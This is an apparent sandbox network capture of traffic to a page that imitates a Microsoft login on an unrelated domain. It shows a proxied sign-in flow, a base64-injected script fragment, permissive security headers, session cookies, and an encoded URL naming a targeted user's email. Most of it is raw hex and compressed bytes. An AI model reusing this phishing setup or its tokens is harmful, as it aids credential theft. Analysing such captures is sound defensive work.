2024-06-21 15:59:31 UTC	2048	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Strict-Transport-Security: max-age=31536000; includeSubDomains P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" x-ms-request-id: c4183601-9c36-41d4-907c-37b4f9012000 x-ms-ests-server: 2.1.18348.7 - WEULR1 ProdSlices nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0} x-ms-srs: 1.P Referrer-Policy: strict-origin-when-cross-origin Set-Cookie: esctx-Ghbu3M8NGZw=AQABCQEAAAApTwJmzXqdR4BN2miheQMYGF6vujKXDYHK1lda4NaoP7399KrTzgz6gd8AWbma8TJtEi2nN6G7u-UHxyrlOK_xc1us_1Ii1677t_7CXaJev_q9Y10ngeMo-SZIqrMpf5pPlOKVgV2wj0x2z7n3nIuQ2jf8bcStGO3kAEvmYxKV4iAA; domain=webnnicuttnortheastusa.com; path=/; secure; HttpOnly; SameSite=None Set-Cookie: fpc=Ahr3BJFnNFVEniLAsb5y5xM; expires=Sun, 21-Jul-2024 15:59:31 GMT; path=/; secure; HttpOnly; SameSite=None Set-Cookie: esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYIig8xnszn6jmmWn4La-r11-kTJ9w8wao0NlfrB-saX422YvC0f5C00BDqgFTmTuinzY2zwsly9b975IuaKlo1F1voYJSFm4b2UelwkAB7ZKJuUCT-GxigDiuqbVpgOBPyrxgTmChDLPtm5Goeq-gSSoZwFH5HckoYOkj4sV6HkIgAA; domain=webnnicuttnortheastusa.com; path=/; secure; HttpOnly; SameSite=None Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly Set-Cookie: stsservicecookie=estsfd; path=/; secure; samesite=none; httponly Date: Fri, 21 Jun 2024 15:59:31 GMT Connection: close content-length: 21479 Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
2024-06-21 15:59:31 UTC	14336	IN	Data Raw: 0d 0a 0d 0a 3c 21 2d 2d 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2d 2d 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 62 61 73 65 36 34 2c 5a 6e 56 75 59 33 52 70 62 32 34 67 59 79 67 70 65 32 6c 6d 4b 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 59 69 49 70 49 48 78 38 49 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 5a 79 49 70 4b 58 74 6b 62 32 Data Ascii: ... Copyright (C) Microsoft Corporation. All rights reserved. --><!DOCTYPE html><html><head><script src="data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2
2024-06-21 15:59:31 UTC	7143	IN	Data Raw: 29 7b 65 26 26 77 2e 41 64 64 28 72 2c 74 29 7d 2c 77 2e 4c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b 76 28 30 2c 65 2c 72 29 7d 7d 76 61 72 20 64 2c 6c 2c 66 3d 77 69 6e 64 6f 77 2c 67 3d 66 2e 64 6f 63 75 6d 65 6e 74 2c 68 3d 22 2e 63 73 73 22 3b 63 2e 4f 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 69 66 28 21 65 29 7b 74 68 72 6f 77 22 54 68 65 20 74 61 72 67 65 74 20 65 6c 65 6d 65 6e 74 20 6d 75 73 74 20 62 65 20 70 72 6f 76 69 64 65 64 20 61 6e 64 20 63 61 6e 6e 6f 74 20 62 65 20 6e 75 6c 6c 2e 22 7d 72 3f 63 2e 4f 6e 45 72 72 6f 72 28 65 2c 74 29 3a 63 2e 4f 6e 53 75 63 63 65 73 73 28 65 2c 74 29 7d 2c 63 2e 4f 6e 53 75 63 63 65 73 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 21 65 29 7b 74 68 72 6f 77 22 54 68 65 Data Ascii: ){e&&w.Add(r,t)},w.Load=function(e,r){v(0,e,r)}}var d,l,f=window,g=f.document,h=".css";c.On=function(e,r,t){if(!e){throw"The target element must be provided and cannot be null."}r?c.OnError(e,t):c.OnSuccess(e,t)},c.OnSuccess=function(e,t){if(!e){throw"The

Timestamp	Bytes transferred	Direction	Data
2024-06-21 15:59:32 UTC	2390	OUT	GET /aadcdn.msauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_sw-M8KkV3_nBot-G1ImRcw2.js HTTP/1.1 Host: webnnicuttnortheastusa.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfU [TRUNCATED] Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8; ClientId=DC6EE31578E74AAEA2886B6234ACAA88; OIDC=1; OpenIdConnect.nonce.v3.f5DiCeMUtBQ2uL8n9vjBqgjOau5wx5op5bEdqzXqekA=638545823704059041.c874316e-312e-451f-8487-a4f0d1f6b223; X-OWA-RedirectHistory=ArLym14BoYywIguS3Ag; esctx-Ghbu3M8NGZw=AQABCQEAAAApTwJmzXqdR4BN2miheQMYGF6vujKXDYHK1lda4NaoP7399KrTzgz6gd8AWbma8TJtEi2nN6G7u-UHxyrlOK_xc1us_1Ii1677t_7CXaJev_q9Y10ngeMo-SZIqrMpf5pPlOKVgV2wj0x2z7n3nIuQ2jf8bcStGO3kAEvmYxKV4iAA; fpc=Ahr3BJFnNFVEniLAsb5y5xM; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYIig8xnszn6jmmWn4La-r11-kTJ9w8wao0NlfrB-saX422YvC0f5C00BDqgFTmTuinzY2zwsly9b975IuaKlo1F1voYJSFm4b2UelwkAB7ZKJuUCT-GxigDiuqbVpgOBPyrxgTmChDLPtm5Goeq-gSSoZwFH5HckoYOkj4sV6HkIgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
2024-06-21 15:59:32 UTC	1391	IN	HTTP/1.1 200 OK Date: Fri, 21 Jun 2024 15:59:32 GMT Content-Type: application/x-javascript content-length: 141507 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Fri, 24 May 2024 22:13:21 GMT ETag: 0x8DC7C3EB8EDBF94 x-ms-request-id: 41669c42-801e-0006-3e50-c21f92000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240621T155932Z-17d856f5577ff8fleyaf4qpw2c0000000450000000013227 x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT Accept-Ranges: bytes Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
2024-06-21 15:59:32 UTC	14993	IN	Data Raw: 1f 8b 08 00 00 00 00 00 00 03 e4 bd eb 5b e3 38 d2 38 fa fd fd 2b 82 77 0f 13 4f 4c c8 05 68 70 da 9d 5f 1a e8 6e 66 80 30 24 cc e5 05 96 c7 89 15 f0 74 b0 b3 b6 c3 65 20 e7 6f 3f 75 91 6c d9 71 e8 9e dd f3 9c 2f 67 2e c4 96 4a b2 54 aa 2a 55 95 4a d2 e6 8f 6b ff 53 f9 b1 b2 f1 fd ff 54 06 c3 de f9 b0 d2 ff 54 19 7e 39 3a 3f a8 9c c1 db 1f 95 d3 fe f0 68 ff f0 fb eb c1 8f e2 ff c3 3b 3f ae 4c fc a9 a8 c0 ef c8 8d 85 57 09 83 4a 18 55 fc 60 1c 46 b3 30 72 13 11 57 ee e1 6f e4 bb d3 ca 24 0a ef 2b c9 9d a8 cc a2 f0 4f 31 4e e2 ca d4 8f 13 28 34 12 d3 f0 b1 52 85 ea 22 af 72 e6 46 c9 73 e5 e8 cc ac 43 fd 02 6a f3 6f fd 00 4a 8f c3 d9 33 3c df 25 95 20 4c fc b1 a8 b8 81 47 b5 4d e1 25 88 45 65 1e 78 22 aa 3c de f9 e3 bb ca 89 3f 8e c2 38 9c 24 95 48 8c 85 ff Data Ascii: [88+wOLhp_nf0$te o?ulq/g.JT*UJkSTT~9:?h;?LWJU`F0rWo$+O1N(4R"rFsCjoJ3<% LGM%Eex"<?8$H
2024-06-21 15:59:32 UTC	1391	IN	Data Raw: 30 2a 48 fc b8 78 01 dc 11 30 9e 50 02 03 05 0d f0 a0 14 1b 37 57 44 ea 85 18 2b bb a9 8c 37 b9 f0 ae f4 06 ed 4a df 40 59 16 40 3f 4e c5 23 45 44 03 9d 11 b8 50 09 ad 5c 15 fc 61 d9 ce 01 c6 82 f6 c1 44 12 4f 38 0b d0 eb 51 40 6f ad 34 f3 a3 3b fe 0a dd 97 99 f4 46 18 38 00 71 11 de 1e 79 69 6d 48 2f 78 09 32 a2 8f 10 40 2f 2d 15 a0 4d 8e 86 49 68 b7 33 31 44 00 54 19 de a0 44 5b 91 86 ee 08 48 9c 2c 60 24 5b 79 31 63 eb 9d 35 98 e1 e1 db b8 c5 03 24 ca c5 0c b7 74 e0 d3 01 4e 13 ed 2d c2 45 7b db fa 82 f7 11 b7 77 ac 1e f0 fb 23 42 ed f2 23 81 6d 35 70 93 16 7c 0a af 04 b2 f7 9a d6 a7 1d da 0c f6 d9 c5 55 37 ef 23 90 f2 4e ba b3 bb 3f 39 0b e3 98 45 9a f3 92 63 1d 52 4e c6 33 d7 b0 78 c3 03 f1 01 27 d2 bb 61 9d 88 e4 2e f4 50 1d 23 c0 9b 7b 7a bf b9 83 Data Ascii: 0*Hx0P7WD+7J@Y@?N#EDP\aDO8Q@o4;F8qyimH/x2@/-MIh31DTD[H,`$[y1c5$tN-E{w#B#m5p\|U7#N?9EcRN3x'a.P#{z
2024-06-21 15:59:32 UTC	7532	IN	Data Raw: 7f 2b 7e 55 0c 8e 9f 2d a6 a9 7e a1 55 8f 37 a4 27 7a 8f f2 89 0a 94 8e 1f 24 e3 94 a1 d2 77 02 80 0f 60 42 f1 a3 b9 34 06 a4 93 60 e8 08 2d 04 49 df 28 73 16 c6 59 4b d2 17 c3 5c e0 b4 32 e7 29 25 d0 a7 b1 b2 13 d1 e7 ce fc f5 15 a7 49 54 05 de d0 25 1a ac 4b 6c a3 2a f1 b2 00 45 42 56 cf c7 fb f3 81 72 4b 23 a1 2e 58 7d 89 f1 a8 39 1b d4 b0 b0 70 fc 5c 5d 3b 7d 0e 6b c5 56 74 5c 25 b7 53 58 3c 75 72 29 8d ae e2 2a 49 07 aa 75 5e 42 29 9e 7d eb 21 7f 5f 42 76 16 fc 62 c1 57 23 e1 f1 74 78 e3 0e d7 43 4e 97 27 79 31 4d 19 c6 60 2a f6 41 45 01 a1 8c 3f 74 8c 3f 3e 98 b6 8b d7 70 bc 40 a5 2b ab 8b 9d 82 ae 21 f0 b2 2e 75 62 6d 5d 9e cd a9 ae ee f2 8b 57 c4 d1 b5 8a 74 0c b3 36 21 05 d6 98 3f 61 27 0b ba 2c ce 4d a1 5c ba 39 0e a6 06 5a 39 12 91 62 fb 11 30 Data Ascii: +~U-~U7'z$w`B4`-I(sYK\2)%IT%KlEBVrK#.X}9p\];}kVt\%SX<ur)Iu^B)}!_BvbW#txCN'y1M`*AE?t?>p@+!.ubm]Wt6!?a',M\9Z9b0
2024-06-21 15:59:32 UTC	8852	IN	Data Raw: 4f 73 ef de df b6 91 a4 8d fe 7f 3e 05 89 f5 cf 06 42 88 96 9c 64 92 80 46 f8 b3 65 79 e2 4c 7c 59 cb 4e 32 23 6b b4 20 01 4a b0 28 80 03 80 92 15 89 df fd d4 53 d5 dd 68 5c 28 3b b3 73 ce fb ce 6e 2c 02 68 34 fa 5a 5d d7 a7 74 a8 bc d1 a7 49 c0 e2 f8 1f 51 cf f1 d1 df 76 17 8d 0f a5 e1 b7 b7 ea c2 b4 1d 26 f9 57 73 6d 98 c9 1b 2e 6b 55 64 0e 8a a6 2f db 6b 73 ff 37 28 4a 70 bb 59 e0 1f 51 a3 c4 1d 05 ea 2f 52 7b 1c 59 e2 bf d0 64 3a 70 28 a4 eb f1 a5 b9 c3 8a 83 9f a2 92 b5 89 9c f7 8d f6 5b f3 e9 6f e9 72 29 8f f1 f4 9a 9f fe 14 b5 a7 59 7b 3b 6b 6b 90 cb b1 b2 44 dc 89 07 72 1d 21 00 0e 07 e6 77 55 1c 7a c3 b3 95 28 89 25 2a 2d 15 42 97 fe c1 ee e0 f6 04 0f d8 23 b4 76 05 c9 e4 86 8f 98 3f 16 a5 f1 c3 08 f8 e3 5a 6d 9a f0 22 75 13 b3 fd 13 ee 0a 53 87 Data Ascii: Os>BdFeyL\|YN2#k J(Sh\(;sn,h4Z]tIQv&Wsm.kUd/ks7(JpYQ/R{Yd:p([or)Y{;kkDr!wUz(%*-B#v?Zm"uS
2024-06-21 15:59:32 UTC	16384	IN	Data Raw: 25 7d bc 59 ea 09 a3 22 55 7e c1 55 db 2f 38 bc cb 31 b3 f2 94 4b 10 82 aa 39 97 1c a2 c9 cc 02 6f 9c c4 0f f6 1b 86 cf 41 bd 0f 1c 63 5b a4 25 1c 0d e6 24 32 e5 17 86 42 1a 07 ec 68 60 de 78 a0 25 c3 9b 8c 5a 13 a4 be 2c ee 40 bc e8 37 93 ac 6e 43 98 4f bb cb 26 da 00 d7 c1 8c 8a 82 a8 d4 ae 73 93 1f 7e 54 c3 e8 6e 61 52 7a f9 1f e3 27 29 f2 27 9b 0f 6c d0 72 b7 49 5d 74 e8 4a 9b ad bc f3 33 35 40 38 f2 26 15 a1 10 04 0e b7 c0 19 38 28 6a 37 7b fa e0 b6 4f 78 6d c9 46 6c 86 c0 03 99 5b 23 77 03 79 28 68 2f 15 88 ec 86 e0 44 e6 e5 12 ea 47 85 16 d4 8b 07 c3 da 57 6c a6 d2 f3 e7 f7 ef cf 19 c0 62 1d 96 e1 3c 34 91 3e 25 c9 41 08 e3 56 4c 41 37 5c a5 f6 01 51 91 26 be e5 3c c8 1a a7 bc e3 29 80 36 c7 ca 0c 0a 60 c3 49 df 51 1f 4f 8b 30 0e 14 3d 5b b8 f1 18 Data Ascii: %}Y"U~U/81K9oAc[%$2Bh`x%Z,@7nCO&s~TnaRz')'lrI]tJ35@8&8(j7{OxmFl[#wy(h/DGWlb<4>%AVLA7\Q&<)6`IQO0=[
2024-06-21 15:59:32 UTC	543	IN	Data Raw: d6 86 51 83 f8 d0 2a 6d 62 95 8d 9c 81 f6 c9 8b 07 aa e4 82 e6 f3 7a e0 56 34 c8 0a c7 ef a2 f4 9c 96 1d 8f 89 91 69 37 0e 2e ef ae 46 d4 6e 04 cb 69 ed f2 a0 7f ed 68 4c 00 a7 d5 3e 6c 03 63 ba ec 9f a7 cf f4 5e e9 fd b8 f7 45 4f ef 91 cb f7 d5 eb 77 9f 1b 85 c2 8c 82 dd ed 21 67 94 36 89 89 72 73 02 22 ff 72 ae 74 c0 3a 3c 85 d6 40 b1 3d 54 eb 0b 97 99 95 70 b1 84 2b 63 85 d0 d8 65 cf 42 a9 24 fb 53 64 85 57 38 07 87 ef 0e df 1f 1e bc fd e5 05 83 37 e7 61 e7 29 9d 59 20 e3 d4 fe dc d3 fa 33 f3 91 54 0d 5f 3d d2 6e 32 6d 56 1a d4 b5 8c 1c 15 21 c9 43 df 3b 73 c8 4e 31 75 cb 16 17 95 14 a5 b8 9c b7 7c 94 11 9b af c3 17 da 5d 29 dc 1b ed 88 1e c4 49 87 62 d1 57 6b 17 b8 11 5c e0 06 3c 2b 01 bd 27 5e be 92 23 98 96 f8 a3 6f 77 bd c9 96 8d fa b9 e1 70 de 3d Data Ascii: Q*mbzV4i7.FnihL>lc^EOw!g6rs"rt:<@=Tp+ceB$SdW87a)Y 3T_=n2mV!C;sN1u\|])IbWk\<+'^#owp=